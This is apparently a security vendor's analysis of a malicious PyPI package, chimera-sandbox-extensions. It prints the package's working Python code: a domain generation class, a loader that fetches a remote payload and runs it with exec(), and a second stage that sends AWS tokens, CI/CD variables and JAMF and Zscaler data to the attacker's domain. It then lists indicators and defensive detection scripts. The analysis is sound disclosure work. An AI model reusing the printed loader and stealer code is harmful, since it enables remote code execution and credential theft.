Multi-Stage Malware Attack on PyPI: Malicious Package Threatens Chimera Sandbox Users


Open-source package repositories like the Python Package Index (PyPI) play a crucial role in software development. However, these platforms are also potential targets for malicious actors attempting to exploit application software vulnerabilities.

The JFrog Security Research team regularly monitors open source software repositories using advanced automated tools, in order to detect malicious packages. In cases of potential software supply chain security threats, our research team reports any malicious packages that were discovered to the repository’s maintainers in order to have them removed.

Recently, the JFrog security team discovered and reported a malicious package, chimera-sandbox-extensions, that was uploaded to PyPI. The package was promptly removed by the PyPI maintainers after JFrog’s disclosure. Based on its name, the package probably targets users of the chimera-sandbox environment. It aims to steal credentials and other sensitive information such as Jamf configuration, CI/CD environment variables, AWS tokens, and more.

Payload Analysis

Upon execution, the package initiates a multi-step sequence of actions. The function check_update() is called on initialization and begins by attempting to connect to multiple domains generated by a pseudorandom DGA (domain generation algorithm) defined in the CharStream class within the package.


class CharStream:
    def __init__(self, seed: int = 0x1337, width: int = 10):
        self.S, self.width = list(range(256)), width
        self.i, self.j = 0, 0
        self.state = seed & 0xFFFF
        self.charset = string.ascii_lowercase + string.digits
        self._schedule()
    
    def _rand(self):
        taps = [16,14,13,11]
        feedback = 0
        for tap in taps:
            feedback ^= (self.state >> (tap - 1)) & 1
        
        feedback   ^=  (self.state ^ (self.state >> 3)) & 1
        self.state  = ((self.state << 1) | feedback) & 0xFFFF 
        self.state = (self.state ^ (self.state >> 7) ^ (self.state << 3)) ^ 0xFFFF
        return self.state 
    
    def _schedule(self):
        j = 0
        for i in range(256):
            j = (j + self.S[i] + self._rand()) & 0xFF
            self.S[i], self.S[j] = self.S[j], self.S[i]
    
    def _getval(self):
        i = (self.i + self._rand()) & 0xFF
        j = (self.j + self.S[i]) & 0xFF
        self.i, self.j = i, j
        self.S[i], self.S[j] = self.S[j], self.S[i]
        return self.S[(self.S[i] + self.S[j]) & 0xFF]
    def __next__(self):
        stream = ""
        for _ in range(self.width):
            r = self._getval()
            stream += self.charset[r % len(self.charset)]
        self._schedule()
        return stream
    def __iter__(self):
        return self

Domain generation mechanism deployed by the malicious package author

The domain generation process begins with the __init__ function, where the seed and width parameters are set. A 256-element array is then shuffled by _schedule(), using pseudo-random values that _rand() derives from the seed through bit manipulation.

Subsequent calls to __next__ retrieve characters by indexing the randomized array. These selected characters are then joined to form a string of the specified width.
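The bit manipulation in _rand() resembles a linear-feedback shift register (LFSR). The sketch below is a simplified illustration, not the package's exact generator: it keeps only the tap-based feedback step and omits the extra mixing, and the names lfsr_step and lfsr_sequence are hypothetical. It shows why a fixed seed always yields the same sequence.

```python
TAPS = (16, 14, 13, 11)  # same tap positions as in the listing above


def lfsr_step(state: int) -> int:
    """Advance a simplified 16-bit LFSR by one step and return the new state."""
    feedback = 0
    for tap in TAPS:
        # XOR together the bits selected by the tap positions.
        feedback ^= (state >> (tap - 1)) & 1
    # Shift left, feed the new bit in at the bottom, and keep 16 bits.
    return ((state << 1) | feedback) & 0xFFFF


def lfsr_sequence(seed: int, count: int) -> list[int]:
    """Return the first `count` states produced from `seed`."""
    state = seed & 0xFFFF
    out = []
    for _ in range(count):
        state = lfsr_step(state)
        out.append(state)
    return out


if __name__ == "__main__":
    # Two runs from the same seed are identical, so the output is predictable.
    print(lfsr_sequence(0x1337, 5) == lfsr_sequence(0x1337, 5))
```

Because nothing in the generator depends on time or on the host, anyone who knows the seed can precompute every value it will ever produce.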

Despite the apparent randomness, the fixed initial seed ensures that the same ten addresses are generated on every run:

  1. `bmehxcvbijyfpdg7.chimerasandbox[.]workers[.]dev/auth`
  2. `0l3qvp0sl3r5rgtl.chimerasandbox[.]workers[.]dev/auth`
  3. `covnn2rvaagchcq1.chimerasandbox[.]workers[.]dev/auth`
  4. `qn2q3zr7js6ubls6.chimerasandbox[.]workers[.]dev/auth`
  5. `twdtsgc8iuryd0iu.chimerasandbox[.]workers[.]dev/auth`
  6. `tnt69eqbib53nbj3.chimerasandbox[.]workers[.]dev/auth`
  7. `4hhmng1s9zobe8gk.chimerasandbox[.]workers[.]dev/auth`
  8. `tpur5v4nwlv62e7f.chimerasandbox[.]workers[.]dev/auth`
  9. `au6ewri21q4jcokh.chimerasandbox[.]workers[.]dev/auth`
  10. `x403y4difmiagvoo.chimerasandbox[.]workers[.]dev/auth`

Of the ten generated domains, only one proved to be valid: number 5, twdtsgc8iuryd0iu.chimerasandbox[.]workers[.]dev/auth

If the connection to a generated domain succeeds, the first payload is downloaded from that URL and executed.
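Since every generated host sits under the same parent domain, defenders can match on that parent rather than on individual subdomains. The following is a minimal sketch for checking URLs or hostnames from proxy or DNS logs; the helper names refang and is_suspicious_host are hypothetical, and the parent domain is taken from the defanged indicators listed above.

```python
from urllib.parse import urlsplit

# Parent domain taken from the defanged indicators in this article.
IOC_PARENT = "chimerasandbox.workers.dev"


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'a[.]b' back into 'a.b'."""
    return indicator.replace("[.]", ".")


def is_suspicious_host(value: str) -> bool:
    """Return True if a URL or hostname falls under the IOC parent domain."""
    value = refang(value.strip().lower())
    # urlsplit only fills in the hostname when a '//' separator is present.
    if "//" not in value:
        value = "//" + value
    host = urlsplit(value).hostname or ""
    # Require an exact match or a true subdomain, not just a shared suffix.
    return host == IOC_PARENT or host.endswith("." + IOC_PARENT)


if __name__ == "__main__":
    print(is_suspicious_host("twdtsgc8iuryd0iu.chimerasandbox[.]workers[.]dev/auth"))
```

Matching on the dot-prefixed suffix avoids false positives on unrelated hosts whose names merely end with the same characters.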


def check_update():
    cs = CharStream(0x749C, 16)
    domain = "\x63\x68\x69\x6d\x65\x72\x61\x73\x61\x6e\x64\x62\x6f\x78.\x77\x6f\x72\x6b\x65\x72\x73.dev"
    host = "https://{}.{}/{}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "*/*",
        "Connection": "Keep-Alive",
    }
    result = None

    for attempt in range(10):
        subdom = next(cs)

        # Authentication phase
        try:
            req = request.Request(url=host.format(subdom, domain, "auth"), headers=headers, method="GET")
            with request.urlopen(req, timeout=10) as resp:
                if resp.status != 200:
                    continue
                headers["x-update-key"] = json.loads(resp.read())["token"]
            
            # Payload retrieval phase
            req = request.Request(url=host.format(subdom, domain, "check"), headers=headers, method="GET")
            with request.urlopen(req, timeout=10) as resp:
                if resp.status != 200:
                    continue
                
                old_key = headers["x-update-key"]
                headers["x-update-key"] = resp.headers.get("x-update-key", old_key)
                
                modl = types.ModuleType("checker")
                exec(resp.read(), modl.__dict__)
                result = modl.update(subdom, domain, headers)
                del modl
                break

        except Exception as e:
            continue
    return result


The function check_update() in the malicious package source code __init__.py
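The defining behavior in this function is that a downloaded response body is passed straight to exec(). As a rough illustration of how such a pattern might be flagged during package review, the sketch below uses Python's ast module to list direct exec() and eval() calls in a source file. The function name find_dynamic_exec is hypothetical, and the check is a heuristic: it misses obfuscated or indirect calls and will also flag legitimate uses.

```python
import ast

DYNAMIC_CALLS = {"exec", "eval"}


def find_dynamic_exec(source: str) -> list[tuple[int, str]]:
    """Return (line, name) for each direct exec()/eval() call in `source`."""
    hits = []
    # ast.parse only parses the code; nothing in `source` is executed.
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in DYNAMIC_CALLS
        ):
            hits.append((node.lineno, node.func.id))
    return sorted(hits)


if __name__ == "__main__":
    sample = "import types\nmodl = types.ModuleType('checker')\nexec(resp.read(), modl.__dict__)\n"
    for line, name in find_dynamic_exec(sample):
        print(f"line {line}: call to {name}()")
```

Because the source is only parsed and never run, the scan is safe to apply to an untrusted package's files.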

Initially, the malware retrieves an authentication token from the active domain:

Token acquired from the malicious domain in order to receive the payload

Next, using the token from the previous request, the malware requests a second-stage payload from the same host, this time on the /check path. This payload turns out to be a Python-based infostealer. The received code is executed automatically, starting with its update() function:

 
def update(subdom, domain, headers):
    """stage2 entrypoint for probing"""
    try:
        # print("[stage2.web]: probing the host")

        host = "https://{}.{}/{}"
        host_info = get_execution_context()
        # print("===========================")
        # print(host_info)
        # print("===========================")
        data = json.dumps(host_info).encode("utf-8")

        # print("[stage2.web]: send probing and execute next stage")

        # print(f"host={host.format(subdom, domain, 'check')}")
        req = request.Request(
            url=host.format(subdom, domain, "check"),
            data=data,
            headers=headers,
            method="POST",
        )
        with request.urlopen(req, timeout=10) as resp:
            # print("[stage2.web] get the payload")

            headers["x-update-key"] = resp.headers.get("x-update-key", None)
            headers["x-platform-os"] = resp.headers.get("x-platform-os", None)
            headers["x-platform-arch"] = resp.headers.get("x-platform-arch", None)

            modl = types.ModuleType("updater")
            exec(resp.read(), modl.__dict__)
            result = modl.update(subdom, domain, headers)
            del modl
            return result

    except Exception as e:
        # print(f"[stage2.web] Failed to post the probing result: {e}")
        print("Error: Code 4")
        return None


Code received in the initial payload by the malicious package

This infostealer is designed to collect a range of sensitive information from the compromised environment. The function get_execution_context() gathers the data to be exfiltrated, which includes:

  1. JAMF receipts
  2. Pod sandbox environment authentication tokens and git information
  3. CI/CD information from environment variables
  4. Zscaler host configuration
  5. AWS account information and tokens
  6. Public IP address
  7. General platform, user, and host information
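For incident responders, one rough way to gauge exposure from the environment-variable items in this list is to enumerate which variable names on an affected host look like credentials or CI/CD data. The sketch below is a heuristic under stated assumptions: the prefixes and markers are hypothetical examples, not the stealer's actual selection logic, and exposed_variable_names is a hypothetical helper.

```python
import os

# Hypothetical heuristics; extend them to match your own environment.
SENSITIVE_PREFIXES = ("AWS_", "CI_", "GITHUB_", "GITLAB_")
SENSITIVE_MARKERS = ("TOKEN", "SECRET", "PASSWORD", "KEY")


def exposed_variable_names(env: dict[str, str]) -> list[str]:
    """Return sorted names of variables that look like credentials or CI data."""
    names = []
    for name in env:
        upper = name.upper()
        if upper.startswith(SENSITIVE_PREFIXES) or any(
            marker in upper for marker in SENSITIVE_MARKERS
        ):
            names.append(name)
    return sorted(names)


if __name__ == "__main__":
    # Print names only, never values, so the audit itself leaks nothing.
    for name in exposed_variable_names(dict(os.environ)):
        print(name)
```

Any credential surfaced this way on a host that ran the package is a candidate for rotation.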

Unlike typical data-stealing malware, this variant targets data specific to corporate and cloud infrastructures. The collected information is assembled into a JSON data structure, shown below, and sent back to the same domain in a POST request:

JSON data structure sent to the malicious address with data examples

The server-side logic then processes the stolen information and determines whether to deliver a further payload for additional malicious activity. However, we were unable to determine what that next payload is; the payload we managed to collect simply ended the execution:

Final payload delivered by the malicious package in case of invalid target

Given that the subsequent payload will be downloaded and executed immediately, the risk is extremely high.

The JFrog security team promptly detected the malicious package on PyPI. Recognizing the potential threat it posed to users, the team immediately reported the package to the PyPI maintainers. The proactive measures taken by the JFrog security team demonstrate the importance of continuous monitoring and rapid response in securing the software supply chain.

Conclusion

The discovery of the malicious package highlights the ongoing risks associated with open source software repositories. It serves as a reminder for users to exercise caution when installing packages and to only rely on reputable sources. Additionally, it underscores the critical role of security teams in monitoring and responding to potential threats.

In this case, the malicious package distinguishes itself from typical information stealers through its highly targeted approach and multi-stage execution. Unlike many malicious packages that indiscriminately target users, this malware specifically focuses on corporate and cloud environments, aiming to exfiltrate sensitive information like JAMF receipts, CI/CD data, cloud tokens, and Zscaler configurations.

The multi-stage nature of the attack further enhances its sophistication and prepares the ground for a potentially more damaging follow-up payload. This complexity and targeted methodology are what set it apart from the more generic open source malware threats we have witnessed so far.

Users of chimera-sandbox and other similar environments should stay vigilant and keep their software up to date to protect themselves from such threats. Since the next payload could not be determined, users are strongly advised to revoke any potentially compromised tokens and remove the malicious package immediately. JFrog Xray has been updated to detect this malicious package, providing an added layer of security for our customers.
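To check whether the package is present in a given Python environment, a short script along the following lines may help. This is a sketch that assumes the package is named chimera-sandbox-extensions; confirm the name against the advisory before relying on it. The helper names normalize and flagged_installed are hypothetical.

```python
import re
from importlib import metadata

# Assumed package name; confirm it against the advisory before relying on it.
FLAGGED = {"chimera-sandbox-extensions"}


def normalize(name: str) -> str:
    """Normalize a distribution name the way PyPI does (PEP 503)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def flagged_installed(names=None) -> list[str]:
    """Return installed distribution names that match a flagged package."""
    if names is None:
        # Enumerate distributions visible to the current interpreter.
        names = [dist.metadata["Name"] for dist in metadata.distributions()]
    return sorted({n for n in names if n and normalize(n) in FLAGGED})


if __name__ == "__main__":
    found = flagged_installed()
    print("flagged packages found:", found if found else "none")
```

The script only inspects the interpreter it runs under, so it needs to be run once per virtual environment or container image.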

Keep your software supply chain secure by checking out the JFrog Security Research center for more information about the latest CVEs, vulnerabilities and fixes. For more information about JFrog’s security solutions, feel free to take an online tour, set up a one-on-one demo or start a free trial at your convenience.